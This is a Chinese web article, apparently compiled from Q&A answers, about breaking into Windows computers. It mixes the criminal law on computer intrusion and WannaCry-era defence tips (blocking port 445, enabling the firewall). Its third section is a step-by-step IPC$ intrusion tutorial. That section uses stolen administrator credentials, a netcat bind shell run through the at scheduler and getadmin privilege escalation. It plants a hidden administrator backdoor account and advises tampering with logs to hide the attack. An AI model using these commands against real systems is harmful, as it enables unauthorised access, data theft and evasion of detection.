入侵Win10系统电脑

1.怎么入侵电脑?

入侵电脑可能涉嫌“破坏计算机信息系统罪”

以下是《刑法》中关于“破坏计算机信息系统罪”的构成要件和量刑。

(2)构成要件

刑法第286条规定的破坏计算机信息系统罪，是指违反国家规定，对计算机信息系统功能进行删除、修改、增加、干扰，造成计算机信息系统不能正常进行；或者对计算机系统存储、处理或者传输的数据进行删除、修改、增加的操作；或者故意制作、传播计算机病毒等破坏性程序，影响计算机和应用程序系统正常运行，后果严重的行为。

本罪的构成要件是：

第一，侵犯的客体，是计算机信息系统的正常运行秩序。

第二，在客观方面，表现为：一是实施了下列3种行为中的一种或者多种：违反国家规定，对计算机信息系统功能进行删除、修改、增加、干扰；或者对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作；或者故意制作、传播计算机病毒的破坏性程序。二是造成了计算机系统不能正常运行，后果严重的危害结果。

第三，本罪的主体是一般主体。

第四，主观方面是故意。

(3)要注意划清本罪的罪与非罪、此罪与彼罪的界限

第一，要划清本罪的罪与非罪的界限。在本罪中，“后果严重”，是构成本罪的要件。这主要是严重影响计算机系统正常运行；影响计算机系统正常运行造成严重经济损失；影响计算机系统正常运行造成其他严重后果。

第二，要划清本罪与刑法第285条规定的非法侵入计算机信息系统罪的界限。这两者的区别是：一是在客观方面，本罪表现为对计算机信息系统进行非法操作，例如删除、修改、增加等等；而侵入计算机信息系统罪则单纯表现为侵入行为。二是从刑法理论上看，本罪表现为“结果犯”；而侵入计算机信息系统罪表现为“行为犯”

(4)刑罚及量刑幅度

根据刑法第286条规定，犯本罪的，判处5年以下有期徒刑或者拘役；后果特别严重的，判处5年以上有期徒刑

2.勒索病毒容易入侵win10哪些端口

大部分系统均起作用，win10也不例外，但win10的安全度比较高，比较安全！此次 永恒之蓝 勒索病毒事件大部分被入侵的都是低级系统，微软已经不提供安全更新的系统。

如果可以建议使用win10比较安全！但主要是要自己做好防御措施防御方法：1.不随意打开/点击/进入/下载安装 不明 网页/链接/网页/软件等（这是最基础的）2.更新安全软件至最新版本，专门应对此次事件的最新版本，要可靠的安全软件（推荐用360安全卫士）3.到微软官网下载最新补丁，或是用360下载最新的补丁！4.这段时间最好每天都木马查杀，漏洞检测。5.也是很重要的一点，把445端口（最重要的），135,137,138,139等危险端口都封闭，关闭方法自己百度，随便一查就会有（最好选择最近的发布文章）6.使用360反勒索服务7.准备好一块系统重装光盘或U盘，以防万一。

8.也要准备好360新更新的工具 文件解密 也是以防万一。9.这一点是最重要，最重要，最重要的，那就是 防火墙 必须要开，（是必须开，而不是可以开，也不是推荐开），不然即使你申请360反勒索赔理，他也绝对不会赔给你的10.如果不闲麻烦可以开机时断掉网线，开机用杀毒软件检查无异常后在重新连网。

3.具体的入侵电脑的方法

IPC入侵攻略！其实针对IPC漏洞入侵的方法目前已经有很多的教程，但是其中很多教程并不完整，所以还是有很多网友来信问我关于IPC漏洞入侵的有关问题，这就是我写这篇文章的原因了。

如果你觉得本文也不完整，那只好去找更好的版本了，但是我希望你能把你的意见和建议告诉我，让我不断的完善这篇文章。本文参考了小榕的流光2000说明文档及其它相关文档，也包含了一些自己的心得体会。

本文欢迎非商业性转载，但请保持文章完整性并注明出处！：-） IPC是Internet Process Connection的缩写，也就是远程网络连接。它是Windows NT及Windows 2000特有的一项功能，特点是在同一时间内，两个IP之间只允许建立一个连接。

好了，废话少说，现在进入主题。 如何找到具有IPC漏洞的主机呢？以前我都是组合一个国外的扫描工具（名字我忘了）和KillUSA的LetMeIn，因为很多工作都是手工完成的，所以速度可想而知了。

现在因为有了小榕的流光2000，所以找到这样的主机实在是太简单了，具体操作我就不说了，大家可以参考该软件的说明文档。 好了，假设我们已经找到了一台这样的主机，地址是139.223.200.xxx，管理员帐号是Administrator，密码是123456。

进入命令行方式，正式开工。需要说明的是，以下操作都是在目标主机没有禁止远程IPC$连接和启动Schedule服务的理想情况下进行的。

F：\》net use \\139.223.200.xxx\ipc$ "123456" /user:"Administrator" 命令成功完成。 F：\》copy nc.exe \\139.223.200.xxx\admin$ 已复制 1 个文件。

F：\》net time \\139.223.200.xxx \\139.223.200.xxx 的当前时间是 2000/12/25 上午 10:25 在 \\139.223.200.xxx 的本地时间 （GMT - 07:00） 是 2000/12/25 上午10:35 命令成功完成。 F：\》at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe 新增加了一项作业，其作业 ID = 0 F：\》telnet 139.223.200.xxx 1234 上面的命令很简单，你只要参考一下net,at和nc的用法就可以了。

这样，我们就登上了远程的主机。最理想的情况是这样的，但是，也许你会遇到目标主机的Schedule服务没有启动的情况，那么，at命令就不能用了，我们就需要增加以下步骤。

F：\》at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe 服务仍未启动。 F：\》netsvc \\139.223.200.xxx schedule /start Service is running on \\139.223.200.xxx 登上远程主机之后，我们可以做什么呢？这要视这个帐号的权限以及该主机的安全策略来决定。

如果你的权限不够的话，可以试试下面的步骤。首先在本地执行下面的命令。

F：\》copy getadmin.exe \\139.223.200.xxx\admin$ 已复制 1 个文件。 F：\》copy gasys.dll \\139.223.200.xxx\admin$ 已复制 1 个文件。

其次，在远程主机运行下面的命令。 C:\WINNT\system32》getadmin 如果成功的话，你就是这台主机的管理员了，权限够大了吧？：-） 那么，现在我们能做什么呢？改主页？下载SAM数据库？都可以啦！方法有很多，我就不一一说了，具体方法可以参考相关教程。

我一般对目标主机上的WORD文档和数据库比较感兴趣，呵呵。

其实，如果你在这台机子上面放个木马或者病毒什么的东东，做起事来更容易一些，但是我觉得如果你跟他没什么深仇大恨的话，还是不要这么做了，这样不好。

作完了你要做的事，不要忘了做个后门。 C:\WINNT\system32》net user Guest 30906766 net use Guest 30906766 The command completed successfully. C:\WINNT\system32》net localgroup administrators Guest /add net localgroup administrators Guest /add The command completed successfully. 这是个比较简单的后门，要想做的更好一些，可以象Linux那样，做出一套RootKits来，其实这样的东东目前已经有了，你只要拿来用就可以了。

现在搞破坏真是简单多了，那么多的傻瓜工具任你用，哎！要想自保，不学点安全知识怎么行呢？ 最后，我们得修理一下日志。虽然Redp0wer告诉我很少管理员会看NT的日志，但是我想修理一下还是有用的。

NT的日志在什么地方呢？可以参考XUDI的文章。但是有一点要记住的是，日志只能修改，不能删除，否则就是自己把自己出卖了！：-）这方面的命令行工具也不少，你可以到一些国外的站点去看看。

4.win10会被黑客攻击吗

个人电脑由于入侵价值普遍偏低，所以一般黑客会攻击服务器，那样会更容易获取利益。但个人电脑也不排除被黑客恶意攻击的可能性。其实电脑系统并不会让黑客攻击的可能性改变，而是在电脑的安全性上有所体现。并且，个人电脑被入侵的主要方式是木马和病毒，一般不会有黑客专门入侵个人电脑。

Windows10系统如果坚持更新到最新版本的话几乎是不用担心黑客入侵。其实个人电脑一般情况下本便比服务器更难以入侵。再加上Window10自带的安全软件，对于黑客入侵是无需担忧的。

不过个人认为，Windows10上的安全软件有些不尽人意。答主可以考虑使用一些免费、付费的杀毒软件。诸如腾讯的电脑管家、360安全卫士之类的。但国产的免费杀毒软件几乎都有些广告满天飞，软件捆版的问题。在这里我推荐火绒。火绒虽然可能算不上国产骄傲，但国产良心是确实的。这个可以又自己的使用感受得出，我就不再赘言了。

愿各位能无忧地使用电脑，不要相信某某漏洞刷某某的广告！

5.勒索病毒容易入侵win10哪些端口

网络安全专家建议，用户要断网开机，即先拔掉网线再开机，这样基本可以避免被勒索软件感染。开机后应尽快想办法打上安全补丁，或安装各家网络安全公司针对此事推出的防御工具，才可以联网。建议尽快备份电脑中的重要文件资料到移动硬盘、U 盘，备份完后脱机保存该磁盘，同时对于不明链接、文件和邮件要提高警惕，加强防范。

临时解决方案：

1、开启系统防火墙

2、利用系统防火墙高级设置阻止向445端口进行连接（该操作会影响使用445端口的服务）

3、打开系统自动更新，并检测更新进行安装

Win7、Win8、Win10的处理流程

1、打开控制面板-系统与安全-Windows防火墙，点击左侧启动或关闭Windows防火墙。

2、选择启动防火墙，并点击确定

3、点击高级设置

4、点击入站规则，新建规则

5、选择端口，下一步

6、特定本地端口，输入445，下一步

7、选择阻止连接，下一步

8、配置文件，全选，下一步

9、名称，可以任意输入，完成即可。

XP系统的处理流程

1、依次打开控制面板，安全中心，Windows防火墙，选择启用

2、点击开始，运行，输入cmd，确定执行下面三条命令：net stop rdr 、net stop srv 、net stop netbt

转载请注明出处windows之家 » 入侵Win10系统电脑